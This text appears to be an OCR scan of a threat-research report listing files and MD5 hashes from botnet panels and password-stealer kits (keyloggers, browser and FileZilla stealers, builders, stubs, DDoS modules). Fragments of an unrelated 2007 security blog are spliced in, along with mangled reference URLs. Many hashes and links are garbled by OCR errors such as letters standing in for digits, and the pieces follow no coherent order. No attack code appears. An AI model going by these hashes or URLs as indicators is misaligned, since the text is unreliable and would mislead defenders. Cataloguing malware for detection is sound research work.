229.gif 
018f3cbb96f02e4308e48c2cfde98615 
23.gif 
7b0f919ed90e293a955d2cb8a970799b 
230.gif 
ead183bbb05b07dda78caf94b0d84298 
231.gif 
c20159165fd9b5e7731a4b1218b560ac 
232.gif 
485ee68dce279a4cb74ed52819e362e0 
233.gif 
39efc9d30fd72f6e3322b89b87d9ef8F 
234.gif 
1a30b3eleb7a98eb6fd7429baa9e87Ffcc 
235.gif 
4fa6769debda7e102bfa11394d19400f 
236.gif 
62deec040ca94808da1a406d18a7267a 
237.gif 
f0783621b317e7670bec81a74fa4d15c 
238.gif 
953c4265af7b272d4bbeb95e2e1021e4 
239.gif 
0b466e805c51d162996753e0f1f161ba 
24.gif 
4c91e67514cf40d56af17e5bfb3e8b4c 
240.gif 
577fa58d01baf03868456b3fc79c52d3 
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241.gif 
€163322c4a28abfb3e54014fa4c0093a 
25.gif 
5a8bed11d786ae1e443613f86ee0843c 
26.gif 
7139f1dd968a309f4734e9609ca861d2 
27.gif 
b7df451e5c56c3c466c769db9113a4fd 
28.gif 
d690a313f8929a4220a9dd5f7cbf3f35 
29.gif 
44a716fcd52139d9ee883e1627ec8c22 
3.gif 
af803d2cc510917a859538e9cf9b2c90 
30.gif 
d4559adb84487fb7f66a2d111f059576 
31.gif 
9ebb31eb9bd1bdca833097f9c4bca7a5 
32.gif 
f52e8c2b3dc0efdf457c93a1a04276ec 
33.gif 
1d97c8668a59c4bae222a130ce41d95e 
34. gif 
06f472f35fc233db58b79e0f380a43b6 
35.gif 
146b3e4d762014efe3fa3218fd94b7a4 
36.gif 
d05bc60641c9da516442366999c4c4fe 
37.gif 
f8dfcd77f222739304421632c7e48f78 
38.gif 
a04b34cd685e33beb759d15dab0fe4c8 
39.gif 
8eec5350a96bdb8070d06fbecO01cb59f 
4.gif 
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b6da3782b873b59de602faa40251a9a8 


40. gif 
6e1b32f961c99940e1393748084b1e9e 
41.gif 
O2ceff386ffeb997981f2b26b6bc6667 
42.gif 
e5alab6a90e92375d9a11b76c95a673e 
43.gif 
dff14a65906803b3fa2eldd6bdb126bc 
44.gif 
9803e1dc34fd09073f550d5256949c14 
45.gif 
42321616a1c294f054c013bb77e50101 
46.gif 
d4539f3662b019383934c12e344497ec 
47.gif 
5b3eb2329de1f928a8351508fb7a4d05 
48.gif 
€07a06dd235248146d7224d76a478be7 
49.gif 
df9261072a3e794e29f33c0c45354c3c 
5.gif 
37f6b5743ed63daaf8c051546f89ad9c 
50.gif 
d0ba03004396b5e6bc59a4c5bdd396c9 
51L.gif 
856f3ad0b428d6c1940fbdb3de373440 
52.gif 
72d6b92b39083ae91a043daab7807b73 
53.gif 
acb0ed13205613ad6d0aac4d5ed5c91b 
54.gif 
e4100184abe6fca2b69ed1e43d7d7658 
55.gif 


ab663b86aef621f65a97088bda51a5bb 
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56.gif 
65557d895955c9cfa7c578364331e166 
57.gif 
9a0e587b8b721853267300e911858c72 
58.gif 
8d014a00da38d2ffal13257c9fa682fd 
59.gif 
2bcfOcfed17d8271214b675edaa6fa44 
6.gif 
9dcf473d88e2effd1c41bba49a139bd4 
60. gif 
aee8cfd7d7636e7df7aa4eacdb251951 
61.gif 
542fbode9d381ac2c75e2fd57955d823d 
62.gif 
9b1b991e34ac2a9316d01b7e66e131ab 
63.gif 
4efbe504fff872148182fde3a9a276e0 
64. gif 
7502cdf18691cc48a167dcd8e8b9cefe 
65.gif 
0945fd0161acf9987a9541bb0cd484d9 
66.gif 
€397193fc1725b87947352dcf84b24b0 
67.gif 
4e9e23ac31f72332d09b903174a38c48 
68.gif 

52a1a01b39f6f14ff5 7a145e2c82b66f 
69.gif 
eaaf1477e718f95a8e2a993fc695a661 
7.gif 
343f151922abe4d904981e8577bc0243 
70.gif 
50afefd6f4ea8821dfd1f3816977f32d 
71L.gif 
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29947a47e0delclal115638fc2c7687d1 
72.gif 
39c34e6872f51231086bd54f14c64884 
73.gif 
52a80bc55141c14f6ee0fe691d6d4f10 
74.gif 
52a80bc55141c14f6ee0fe691d6d4f10 
75.gif 
24d20928cb0f345659739ea349d0d20b 
76.gif 
clbcc44017085443c6376c6d47da66d9 
77.gif 
3¢7451994352c2e8083e000edc0e0b7a 
78.gif 
f47afbff19e1b1e45b3c2d363822bbe5 
79. gif 
65ed9d2187c4fd8ca467b76c6047885c 
8.gif 
73d7ba67641e4d634eb477079801d5b5 
80.gif 
f58fa2d59ae057eeda7acOb3aedc3027 
81.gif 
20533204cae6bbcde4e2bd7327f0877a 
82.gif 

Odfb29b6f64aa0e7 7db62eb495d86b29 
83.gif 
4502f26ec51764f07ff00da3e3eae0a8 
84.gif 
51ad4f4d5e1d8a193c3e9a8c541101bf 
85.gif 
b32fab25880788729056fcdf5fe4a99d 
86.gif 
5b633d5dd3416e00997f221879ecab538 
87.gif 
f2aee064bcOb1e29eec6c58b80101cfd 
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88. gif 
b458c5eacd65789bbfd728506d1bf8el 


89.gif 
2d359ce812d664433a6c6b3343ef438a 
9.gif 
4914e360e499cc6f3fa70dd707eb23b6 
90. gif 
6291e3e39f4402ba3fb074baeaa224f3 
91.gif 
b5b26b771a542762fc93b8ffb3f29ba3 
92.gif 
60825907a63ee68101200974bde4b21e 
93.gif 
142f1a438411c868560f8ada159702eb 
94.gif 
6a8dfldfa0ba72eee0f6cd7d45a45ba8 
95.gif 
0aa86b6385b5902ad03c3292604e3dbb 
96. gif 
6e35d1ef0253ba10814e8321db6bf683 
97.gif 
a2eeee677e6e4840fbc583acf0426e83 
98.gif 
9e4a1c0783e22d2d3654639a5f259227 
99.gif 
3e7b659881a3796ce33703bc5a0362651 
basic.png 


55a687e848244b76f8d8249b111df860 
connections.png 
ab0667280425cdc664722967d7d91d21 
group.png 
3afbbb77c13a366898f9088f7ae086a0 


misc.png b812fdldc52bb98af4982b67049e85bc 
star.png c8ca219ff43a2fb1dea67de2582123af 
user.png a8b95cb88438374e20d7ff905dbd9f94 
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user _gray.png 
cac109a5658accb74c8216f247949c85 
dos _sock.bss 
65870fa25267e3402be06f17b2a39cf0 
nir _cmd.bss 
flc88bcbddfbab2840b1e4184561c488 
pws _cdk.bss 
85cle270f7eb2912781b49d8693f6ae9 
pws _chro.bss 
71fleee5a0c860ba1983c7cfb96bea40 
pws _ff.bss 
bf8fb698baa8308a8f1lcOcf86aff9651 
pws _mail.bss 
969fd1e0449fala4b5b94e0a37cacded 
pws _mess.bss 
c81df210b673ea4fc4443531c242da0f 
Default.bss 
343dcaacec1la85f6f62fd3090b502394 
areao4 (2).msstyles 
7b6ffe26cc03209cecalaa87a0b98a5d 
bss-black.skn 
5db1363clae3fd406d206e53a7e02944 
bss-brown.skn 
f52f65610fdb82f98a8810571c24e7a9 
bss-flashy-black.skn 
0c858cb39e08a929d85aa0ab4a6e1834 
bss-grey.skn 
14d98dc49e9906e0fd2802d02104fab9 
bss-light-gray.skn 
4eb0b41d98804575ab9cda351ee045a7 
bss-lines.skn 
7b6ffe26cc03209cecalaa87a0b98a5d 
bss-mac-osx.skn 
0e965573c27a6df869739aa2c2217d89 
bss-office2k7.skn 
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6c81f596bfda0b754e3514a46ee48119 
bss-simple-black.skn 
73918a13a6d63c8a3913c99083243249 
bss-smooth.skn 
2884ed2ea4807d4bddd25415e49c5cce 
bss-xpryoal.skn 
6cO0bd266c38cb1020ee0c39e4b9b4123 
Luna Royale.msstyles 
b66c68215c5b064a8fd50c956cc7f6ea 
Mint.msstyles 
f3ae52aaec4a4b8d2caal4caaca7/522f 
Orion.msstyles 
685f4faba93cabe195a9309ddf8ff084 
countries.bss 
6aba7afa8al0e03ef45ae40927da3619 
ddos.bss 8c4cc634eeb3dd6399da069c41594d64 
ddosfail.bss 
11843af3ba5ce2cff1f00dc16b270954 
ddosstats.bss 
b08081a5fb7670355d46e25ed1bff010 
dload.bss 
bb7f593bc465e533058b1b139d4576c4 
dloadfail.bss 
cac227d348dc903957cfaee74e5f2d72 
full.oss 40be1b918a2f494058a2fef403f35f65 
login.bss 
13926c7bala106a56132489b42347c06 
loginfail.bss 

56033b19dff2f7 1b5ef7f2ab18c28d17 
main.bss f63a02f7cd79ea8762535f4f527f9d98 
os.bss 
ee4951d154d84c960df822fc809Ff7f66 
pws.bss 
de9651ef8a289ca567409490e42725cf 
settings.bss 
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As in every other competitive industry, pretty much all the market participants such as bot- 
net masters, pharma masters, spammers and scammers, follow what the others are doing 
and by taking notice in which practices the others outperform them, figure out how to apply 
them within their practices at a later stage - competitive benchmarking within the underground 
ecosystem is already a fact. 


1. ftp: //ddanchev. blogapot.con/2007/0 /atora-vorus-fast-flux-networks. kta 
2, http: / /ddanchev. blogspot. con/2007/10/love-is~peychedelic~too.html 

3, heep: / /ddanchev. blogspot .con/2007/10/assessing-rock-phish- campaign. heal 
4, http://w. eveek.con/article2/0, 1759, 2191940, 00.<sp 
5 
6 
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ttp://www.mooload.com/new/file.php?file=file01/111007/1192118547/pharma_domains_fastflux.txt&s=t 


. http://195.210.38.41:2082/file01/111007/1192118547/pharma_domains_fastflux.txt 
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2985b08b09eedb207861a5e8ffd9f069 
unauth.bss 
d9416b8170fff639a2c044899f68351e 
users.txt 
fcbb33460713585dc46b95e993a42893 
README.txt 
9185ce8327988c6e1d02249e53d9f143 
cddel.php 
19cf9eb705a3c755d5bal4e166c6112f 
cdkey.php 
6942cfabedb79cc2be04a907c28f6eal 
conn.php 37ad5f60b9f54dc9b74baal15815acf0a 
conndel.php 
a70baf5e5f06f0601530e5b88451bb13 
index.php 
f5c3f16ab56913616e6a531ede533939 
keylog.php 
aeba8c729a2cdbeb6f4e4b6afdb491lac2 
pws.php 
4e9ca5b82e62f9a6996e00ecalefc7fc 
pwsdel.php 
5ba5136760328f58cc98ee95c4f17706 
rev.php 
8baa6c98035ebca3010b4e075f379714 
.DS Store 
9cd84cee4105030d9eael1c76a434eb84 
bssnet.php 
be5d3add9a98579deb8ab79602791128 
dwsync.xml 
95a3918c920420c59dfdeO0b1lacd54917 
demo _page.css 
0490ab7ba4d114cb224e619cO0d3adbba 
demo __table.css 
Ode9bd61d186be9386891b532236658f 


menu _style.css 
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Off6b2e93edc1327854f59elc6d8f494 
oneColLigCtrHdr.css 
8a5c019ce3b77d1271bd94650f7eeleb 
style.css 
42b0d00a5a1242ecb3c2d5c04b8b8041 
dwsync.xml 
42858c25ef3f7d0808fd6e7ead53c399 
b-content3.jpg 
8e7f40aal10dbb5020c9e87c393cbd7c3 
bottom3.jpg 
1e9a2c3a5e9688cd05497aeec9938327 
bottom _bar2.jpg 
a77278fle7e6bfdfdae9e8930ece9304 
button2.png 
7€349c221317f01b430852165de4370c 
button3.png 
Ofb84be31d8ad728f2845c46aa7ae3d0 
content2.png 
9d163df433f71d91f5b0fc72c5f3c5ab 
copy document.psd 
e56d61ced0696c99bf9F4ffF7 3 7f21c9 
copy.png 4693e94dbf5ba4e0a28ad4b0535f5828 
copy _hover.png 
d681f5b29baaa368e7f309f9d08fa5e2 
csv.png 
04bf5d1e88e09bb87b8d51a7411e5dab 
csv _hover.png 
04a1cb8a2794a605461f8211fe46738c 
current-bg.gif 
a25a5adal157f5257f3711433e9d60dce 
details close.png 
c898cf9eel4acb6c43909bbe29fb0b36 
details open.png 
10536bd1b325a99b5e8808de9fd597ce 
file _types.psd 
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72310ab8674f6216e9a5f66ee5e58e3b 
menu-bg.gif 
fc8fe2e9f91fe48e8c4d9fbbbef9baaa 
menu6.jpg 
345d6c66d3648852c327c45c7db71585 
print.png 
b12a9855f2b25f5a770753ddf9546b4d 
printer.psd 
c38ee5906af9ae70e499fb3e0af86cd7 
print hover.png 
4dded8247005cc26a611a713fdd31335 
top.png 
5c459dbdf52d16de53862af1cb365990 
x.gif 
9eca372807e455a437a5f90d171a1c47 
X.JPg 
0d19afc9603f799d355447d073a874f1 
xls.png 
e7db69e4cae5a975d12a9922bd62855c 
xls _hover.png 
cc50cef418d070dc204157ea11f44ee8s 
dwsync.xml 
5065fb2a6b6eb7c21c684aed3f1lb6c3f 
ZeroClipboard.as 
66d654280f11f11ff3e7 9afa002d9f78 
ZeroClipboardPdf.as 
49d7f08efd7e1a70d0ed324517c6eb77 
AlivePDF.swc 
eefb8ea538f0fc8d54e5613b4e81c83f 
TableTools.css 
79c445a96cd14e0338654d938f586bd8 
TableTools JUl.css 
b8c4a3eee3ff60bde898396657a75355 
dwsync.xml 
7f37c1aa3291befe116128b3b5c5157f 
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background.png 
0953547609fedb241a4f6e86d47cc57c 
collection.png 
b8b601fbe718b934ec74e2e910c28afa 
collection hover.png 
aa2e592ba6fa4024a2e5adb63e4d2fof 
copy.png 49816clabbb0646aa7fadaea57cc2d3e 
copy _hover.png 
Ofc278d1lef776f8cledbc7ab272fd850 
cSV.png 
04bf5d1e88e09bb87b8d51a7411e5dab 
csv _hover.png 
04a1cb8a2794a605461f8211fe46738c 
pdf.png 
b2c9c2e53dbe4590899b644e74e21cec 
pdf hover.png 
fee93c289a49bd1a98399b9bdadf4627 
print.png 
b12a9855f2b25f5a770753ddf9546b4d 
print hover.png 
4dded8247005cc26a611a713fdd31335 
xls.png 
e7db69e4cae5a975d12a9922bd62855c 
xls hover.png 
cc50cef418d070dc204157eal11f44ee8 
dwsync.xml 
cbde55536eeb08d7295ebf7 63cff344c 
TableTools.js 
d8a7fc6ca87eca93ael179df5ff74484b 
TableTools.min.js 
0f360b2767130536201ea007394b98ce 
TableTools.min.js.gz 
4a7a0c33b18d7d5e5488408550da32b8 
ZeroClipboard.js 
64b4a4d23618f65ed114a66f931bb76f 
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dwsync.xml 
623a8de9c60a61aca9f9919dc3517689 
copy _cvs_xls.swf 
4fcaded96ee2274bc3c6b4d76b56a762 
copy cvs _ xls_pdf.swf 
8913b3ec163aa46ffb28685097bf7ald 
dataTables.scrollingPagination.js 
Ofcle916e990a0608484cbbfe412888c 
editable ajax.php 
7ea157f789dcb128703f2a7ecf2c35c5 
jquery.dataTables.js 
b46aae7d5573b5af4e5101fbfa5774e1 
jquery.jeditable.js 
19d190e8916d737289ce1344c99af01b 
jquery.js 
73a9c334c5ca71d70d092b42064f6476 
jquery.quicksearch.js 
93faae42989ceb6af1l67f9be83c8aa7aa 


xpath.js e044c49d2d39ce95506e588f83a40b81 


dwsync.xml 
07fcdf2e47c32d759e9526124a9f91e9 
server cdk.php 
786b15e38959e93aa88cfc912ed73ac6 
server _conn.php 
4be8bc83feda38fa38cab5dc4373955a 
server pws.php 
97ab954779e1ef247703c1352d06b6al 
server pwsedit.php 
1aa4613e558875ff851a8752c496be21 
dwsync.xml 
d29f8bca37137dbe71bfb222bee213ec 
spryconn.php.mno 
5ed1fcbf444dfaa4445727769f9a0230 
sprykl.php.mno 
O8fce5f61b8999ed3aa7ac7e9ccclebb 
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sprypws.php.mno 
d764f2a90967e4cd0db38f0c9e703064 
bssnet.sql 
4f6482687fb87c2437e8b59cae0092e7 
README.txt 
177d8ae4fbf60c1ca4d7a43faal4b06b 
Albertino Simple Keylogger.exe 
c3e157939db34473f017e1ab14de7317 
Screenshot.jpg 
9114c8fdc9f7dc45f7e3849cbac361c0 
Allround Stealer - Builder _1.exe 
e4a48314e465e0292b437d312772dc48 
Allround _Stealer - Builder _2.exe 
€5799076726c5974159948ca2720fafl 
PumpitUp.txt 
54e117377464b034b682cdb25e1b9432 
ReadMe.txt 
0e2a16b53c0328a2b15f60c2807d1334 
Serial.txt 
d42a2624ae06c34795178c4d4b476898 
setup _akl.exe 
eb9e76ce73187384507f076a7892bb79 
Screenshot.jpg 
d5aad64c43bdf9776f92cda19b5447ab 
Armageddon Stealer 1.0 by Krusty.exe 
04db22887e319c4e0c98cf8427d88832 
stub.arm 03c537a05e9e03183d704d92f1dc7c55 
desktop. ini 
55a610629bc891a838380b5edb855c2d 
Screenshot.jpg 
9714139465fa619389af8a4823c078d9 
Builder.exe 
5a34cba7f424c99aac7cf0042b0ealbb 
log.php 
03aa3cc0061285ac70b82c6476c0d7dd 
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Codejock.CommandBars.v12.1.0.0cx 
©3089b5a74fb3b4279c35b87e70e1f16 
Codejock.Controls.v12.1.0.0cx 
3930aabbbc4ac043060a8898508962af 
Registrator.exe 
0al107bbfl38aaac2daeac73cb56f1e00 
Screenshot.jpg 
5a635f38287df871le5e8af3f9adcl140a 
Blade Stealer.exe 
99148648e297d2030abfc214f9c23b9c 
Codejock.CommandBars.v13.0.0.0cx 
cf73808b6f9c7b52eff7719ba909fed8 
Codejock.Controls.v13.0.0.0cx 
55494584d369f207e6e1b071e7168ec0 
CODEJO 2 - Kopie.ocx 
d1697e6ddbec0874de6bdf9d334ee5al 
CommanadBars.ocx 
cf73808b6f9c7b52eff7719ba909fed8 
Controls.ocx 
55494584d369f207e6e1b071e7168ec0 
Registrator.exe 
0a107bbfl38aaac2daeac73cb56f1le00 
Skin.Style 
713a40589cb12d5e8a80855d345al72b 
SkinFramework.ocx 
048b6fddf7f896881ef9076067720e9c 
Screenshot.jpg 
ef1828c537bed14ddd087ef83b59736f 
Codesoft-PW Stealer 0.35.exe 
42bdc3b72e3e1873c09ff3220679b903 
Codesoft PW Stealer 0.50.exe 
7¢€33817e12dbaeeb391525974ad2e5ce 
Cyber-Shark.exe 
1f0300124c5fa766f66fdcae4ed430ed 
10.ico 
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c747f9ff8e5654674386bdb6de0bb0ee 
124.ico 
44d99073dd365532da58c6e539749b6b 
36.ico 
3d8e292494e79d26c40661cc37c3e2fe 
498.ico 
b54a242f87518268a99fb4758a373b89 
5.iCO 
6213e88262cd9ddd951fb00030969240 
6.iCcO 
17468fa7fd93140f517949f8b128c195 
7.icO 
3b60201145f71c2fb6dca019f061b553 
84.ico 
2c3e8839aba20e30862dc9548a77869e 
a.ico 
3d4f166f825fa4c636d20116eb082ab9 
access.ico 
be876694840e113bee3502506b01ec4f 
avi.ico 
42ef2c97e72607e3a8ddd0d96f49fa81 
avi98.ico 
29ed085432f740502e7e63004d7303da 
bat.ico 
dbfa52acee248c454d2e9b8129e86cb8 
blank.ico 
562f88d51445e953107d28f361437f48 
bmp.ico 
96532507be2fd90c6a35ee7363a21f9e 
cd.ico 
3be2b6b2ad2118bf5eae9acb0459898c 
cmd.ico 
896efc2b6153d222239e0b0a648cfaa0 
contact.ico 
d44b030e3472a8b9874f79d5dbe9c942 
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de.ico 
eef26d01ca55576d581813cda86ec828 
def.ico 
fo07e060c714caf077cb3713108ed368 
default.ico 
20d34d18d39bc7c18592024fc66de242 
dil.ico 
9510e408dba8523e5c5857a936007389 
dilxp.ico 
495fd2b273fb6ca2f077860de2b335cc 
doc2000.ico 
46e0b8c7e7ala4d37b9a65487dfea46d 
doc2003.ico 
833317c2de3c4b321cc5b482db56787b 
dos.ico 
151c5730902bf607e5e17c5131789a3a 
emule.ico 
afc8e4claed5cb3485df725341b97f63 
excel.ico 
fed522e337a/7ae6b92a6aa7be2e34d74 
file.ico 648d1c06d27385f18f51e3045ca0a/7f7 
folder.ico 
70225439ebe7acd1140bb8aa003265b4 
gif.ico 
eb055cb42382ee826bc7ced15f3555a6 
hd.ico 
fe72647410e270caaaedcclfc7c7e5ea 
help.ico 6bd545fObe8e4ae72e414dd89630e6c0 
html.ico 609192c846ff7c443e1d838bac069e4a 
ie.ico 
934c4d9725f0f8343cc931370a6ef198 
iexpress.ico 
e313bb3cb55c22bfcf642bfdeac8710c 
imageready.ico 
5a2f2c2bdd45d18c18d7608c3c8a0ca5 
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inixp.ico 

6f40f5df7694e6bdf4d08581a3468e47 

java.ico 7dcfa5dc0a2584f4efe179e105a09bd3 
jpg.ico 

9a232640cebff63d12e1a0672abf8aa3 
mdb2000.ico 
b3d613523e4fb461d1bff51976f02e3b 
mdb2003.ico 
4f72c89a6297ab01523bf2854b8e9b7f 
mipc.ico Obc047ef455180591ad3c306ce2b7e91 
mp3.ico 
20d34d18d39bc7c18592024fc66de242 
msdos.ico 
65c2f681822c2f3b4f56917825ed86c0 

msn.ico 

15ba63344fb57637fa7c252b1c55666b 
msn7.ico 1d4788b133b56804fdfd96fc5c0c183f 
msn8.ico c747f9ff8e5654674386bdb6de0bb0ee 
netmeeting.ico 
78896f97557afb6a4befaa686a109982 
network.ico 
elb9dedf5b9clceffd485ba2923cf357 

none.ico 117e05ec621abfb960da997926b739b1 
notepadxp.ico 
9752ffe8ea99371c7250bf6F7c011a96 
outlook.ico 
2708db3ea36d7b2a97688cd568eldc52 
pack.ico e6db6a752751lacf3c8d9277f40c9blef 
paintxp.ico 
23082cf97147ff6abdbf4cc6cad94c42 

pdf.ico 

d5d6aelecf7470c4f93509d97cd4aa56 
photoshop.ico 
64fcldbc494dfddb92e63f0eb6a5eb384 
playboy.ico 
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3.10.10 Does This Blog Speak for Itself? (2007-10-11 20:33) 


Download Statistics by Story 


Publish Date Name of Story A see 
2007-10-08 Assessing a Rock Phish Campaign 5 
2007-10-05 People's Information Warfare Concept 11 
2007-10-03 CISRT Serving Malware 8 
2007-10-03 DIY CAPTCHA Breaking Service 12 
2007-10-02 The Dynamics of the Malware Industry - Proprietary Malware Tools 11 
2007-10-01 Love is a Psychedelic Too 13 
2007-09-30 Don't Play Poker on an Infected Table 14 
2007-09-30 Zero Day Vulnerabilities Market Model Gone Wrong 13 
2007-09-29 4 New DDoS Malware Kit in the Wild 16 
2007-09-29 DIY Chinese Passwords Stealer 18 
2007-09-28 Syrian Embassy in London Serving Malware 14 
2007-09-26 China's Cyber Espionage Ambitions 17 
2007-09-26 A New Issue of (IN)Secure Magazine "in the Wild" 18 
2007-09-26 Localizing Open Source Malware 18 
2007-09-24 The Dark Web and Cyber Jihad 18 


Before January 2007, | could only say that I’m glad to have you as a reader of this blog, but 
with the [1]Talkr-ization of my blog during that month, | can now freely say I’m also glad to 
have you as both, a reader and a listener taking into consideration the interest in the [2]audio 
versions of my analyses. It’s great to follow the progress of the service and the efforts the 
folks behind it put into improving its quality. | can only hope that they reach [3]Ms. Dewey’s 
speech engine, even go beyond it by allowing customization in the form of different voices to 
choose from. 


Moreover, all the readers who are interested in [4]reading this blog on a mobile device, can do 
SO via a newly started service called [5]MoFuse that I’m using as of recently : 
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4ef8649261810f0860c48610586b3918 

plus.ico c767b2cb65dc161daal1f5f57fe5026fd 
pps.ico 

9236ea9c83bc3cb6fd7fa40deb71d1b40 
pptxp.ico 
laa5fe80ead8b6fed6c76b26005024 ff 

psd.ico 

08454f807137ce585a596fe9176baf24 

quik.ico d7b251f22f514c223eacc2a4aa226422 
r-2.iCO 

79fbb99440c48ce566b8a0722f7e0fe4 

R-4.ico 

5928db5f93d1e36eda3b9a3e37056daf 

rar.ico 

7260c610f702319e6ded8307795dbdce 
rarxf.ico 

9d51c30da908fdba8070296bb5fdd222 
rayo.ico 8296d3346c47c37355e7d6aa9b3d9d12 
recicle.ico 
f102c891a6c35a3a4bfed1b7bb259ba0 


script.ico 
b689617ec6c2a4cff8cal7fcd7d617a5 
setup.ico 
58bab6bab6f20d7be7f2a788adcb0473c5 
setupxp.ico 
6213e88262cd9ddd951fb00030969240 
Thumbs.db 
172502cc9017d464bf32dd26eaedc878 
txt.ico 
17468fa7fd93140f517949f8b128c195 
txtxp.ico 
9c77bd9b43bfc2a8b014b632ce3da82b 
update.ico 


d32c33d152fced35653164b5661cf213 


vbs.ico 
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2f456232bd700ecbb8aaebab2b8aldd6 

wav.ico 

43a9bda447b009213141031f1489b990 
winamp.ico 
3b60201145f71c2fb6dca019f061b553 

wmp.ico 

324c9a15e1f9d59b7ea20e2474d2c32f 
wmplayer.ico 
c0e833b4b4d3c90ac8d30cb943d08663 
word.ico 243184d9a9caf17721e1ba870db9991e 
xls2003.ico 
59c19bed4bab7419e78d311da6ece914 
Screenshot.jpg 
690411f512aab5e41f36f3ff778f14da 

Dark Screen Stealer.exe 
af56cf9662dbfd4a6635d7a8e668254b 

stub.exe 2e57964c8b0a7f1f7742133dbbfb5ed5 
Screenshot.jpg 
f72806c9e0501dd3adb6cal12ba15283e 
Dimension Stealer V2.exe 
8bf3170533bd41e851f64981b58620a9 
Interop.Office.dll 
375879cfe099ce10c8990a240F78b047 
Interop.VBIDE.dll 
c04d614f279cc0e944f230d51f6e7f82 

Stub.exe 8a397985b8e847ca7de153f182844e45 
Cure 2.1a.exe 
959c46f174ca78687614afalb366be76 

Easy Logger Public 2.1.exe 
404b0e83fd34b510ddd3013e6d3ebf29 

Readme for 2.1.txt 
52a419f04a6d527ab7a63c9b34b73080 
serial.txt 
735a99d43ac6fa996a3bea7e1261c6e0 
stub.exe 4cb259b757ce219e78eb721b9294e8d1 
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Easy CMD.exe 
504be5873473d3ed7d00dal1125389c8c 
Easy PC Locker.exe 
70a345c3154c900fa6c4010a18a0cl1fb 
Easy-Bomber.exe 
a74653b0d34d56d205084f1c66829330 
Random Generator.exe 
35e9eb6b862e56d2d6957d6d0ellesg2a 
Readme.txt 
7861f6589e44f9296d4ceefdf716f910 
TextCrypter.exe 
e€c3364500bfd2980f0933c9c64c0ald6 
list.txt 40ed18650d0577f8ff8d6e82c079cb01 
njBF.exe 666b5a8dfa218555c3c05cda89d46967 
pass.txt 7d162c2e8dff4bfd73789c37a38c7065 
Screenshot.png 
7f0aa89cbb0b4ea67db3cfc998216e4a 
FileZilla Stealer.exe 
c782e9b46e14b8818e87570995b3c060 
send.php f370aee3db9c067a7b38422b51d64143 
stub.dll 6b72f7a3c43bcd19168107423fc5d2b9 
Screenshot.png 
7f0aa89cbb0b4ea67db3cfc998216e4a 
FileZilla Stealer.exe 
c782e9b46e14b8818e87570995b3c060 
send.php f370aee3db9c067a7b38422b51d64143 
stub.dll 6b72f7a3c43bcd19168107423fc5d2b9 
Firefox Password Stealer.exe 
b70cc855805cfe709f122a3afa43f9b2 
Screenshot.jpg 
2931b464e46f03ad82920532bda5d9c6 
Builder.exe 
199befe2a54a5d7c6b29c239ca4181c5 
Stub.exe 740090de23a2dc9b9e7b11858c51b55e 
Screenshot.jpg 
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59ed46b7ec1440a18ddb05b4c90ff122 
Fly Stealer 0.1.exe 
9169e8f436f78c767c6e179fe5031ed7 
PHP.rar 
661a417776dbf7284a03b2f1d55a33f8 
config.php 
ff1e9b635e323694d7a62543e3149eae 
index.php 
930f8ac5c834cce59032702dd5b229d8 
install.php 
2ac37f918e93a53b8a621f1d63f9eb1d 
style _dark.css 
9354c7f9f6d65edb9f9ac123ead217de 
style _light.css 
9354c7f9f6d65edb9f9ac123ead217de 
Screenshot.png 
c0815f76ba32ca37f52b2f1d97a41dee 
Fudsonly Stealer 0.1.exe 
9981bf49e9d9d8f496F7 0f600c2d6921 
Gmail Hacker Builder.exe 
ca6cb339e887b21ccf994aa95d428474 
Preview.jpg 
2e726ab3cc9b0eacbO02c7c73b7ce6130 
stub.exe 5d8fcb76bd181413a1f314217d677051 
Fake Builder.exe 
dc38f298fdd791b1aa92e0065903177d 
Screenshot.png 
af5738b43b44c5c78a427ca50a89a8e8 
Stub.dll f955358478456255c56ecb85df608ffc 
Fake Builder.exe 
dc38f298fdd791b1aa92e0065903177d 
Stub.dll f955358478456255c56ecb85df608ffc 
Passwort.html 

Passwort.php 
990cedd7b1b44330306f88179eb4fe5e 
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Passwort.html 

Passwort.php 
990cedd7b1b44330306f88179eb4fe5e 
Screenshot.jpg 
42cc2b1e609643c684795c8b92761004 
hackhound.exe 
8c2e8dcc7abd360acb13407cd315583d 
Kelinci.exe 
b700d42f4768c7e47b68234e6b81eedf 
config.php 
7c010ee1b9856b72b36eaa9bd7b7d4da 
index.php 
160f3004df54c709def5aa2c24cc2ca5 
install.php 
27606375f5b09d5d01fb6f2372a0e3c7 
mail.php 65480e2688730b7b822ba725e47c1769 
style _dark.css 
9354c7f9f6d65edb9f9ac123ead217de 
style _light.css 
9354c7f9f6d65edb9f9ac123ead217de 
hackhound.exe 
7441acac7645c3b43a7e878a4e25e2c2 
Screenshot.jpg 
9ca4292473971a22190191d1017b2088 
TUT.txt 
077d7f17f6b5939ad960371dd82ffb75 
config.php 
7c010ee1b9856b72b36eaa9bd7b7d4da 
index.php 
160f3004df54c709def5aa2c24cc2ca5 
install.php 
27606375f5b09d5d01fb6f2372a0e3c7 
mail.php 65480e2688730b7b822ba725e47c1769 
style _dark.css 


9354c7f9f6d65edb9f9ac123ead217de 
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style _light.css 
9354c7f9f6d65edb9f9ac123ead217de 
Screenshot.jpg 
d16b314611fb594997d6d9f474ec6ad6 
HardCore.exe 
4ede3c29eea2109669f35b6b8d323a0c 
config.php 
7c010ee1b9856b72b36eaa9bd7b7d4da 
index.php 
7b67ee0dec7bbd9f6e9ab49Ff1730c4b9 
install.php 
27606375f5b09d5d01fb6f2372a0e3c7 
style _dark.css 
9354c7f9f6d65edb9f9ac123ead217de 
style _light.css 
9354c7f9f6d65edb9f9ac123ead217de 
Screenshot.jpg 
dbb9b170663d51f497be26bb115ecc94 
ICQ StealOr.exe 
e64d92cf53162d2c9dc37847c3058d06 
send.php 7e822b74e362aae399e3d99c83a655fd 
bassmod.dll 
e4ec57e8508c5c4040383ebe6d367928 
Screenshot.jpg 
6de3213d7e82f13da57fcdc6037a423a 
iloader.exe 
49f39ab7739189cc365f8770659a38ce 
iStealer 4.0.4.exe 
48a4cf6db69434426c428a9a5d86898d 
Readme. rtf 
63141df523d06946573f58a06501799e 
Icon01.ico 
2f2429ebec0cb515de572daa21af36be 
Icon02.ico 


111bd394a2570cdaclb6b7e511laace25 
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Icon03.ico 
311705112206b60b4fac05a03bdeafcd 
Icon04.ico 
d8271455f17d850cd10343724f838e3c 
Icon05.ico 
8d63492512d853bb217d7d33e655b01d 
Icon06.ico 
476a3b82a1f9f1e603a50ebd0f6c2364 
Icon07.ico 
03f55bc3fc8e0399418dleccaa3cd5ed 
Icon08.ico 
3d757c45346c992ce7947438f3024d21 
Icon09.ico 
7014e49f28343fd6ea383fe21lebd6e55 
Icon10.ico 
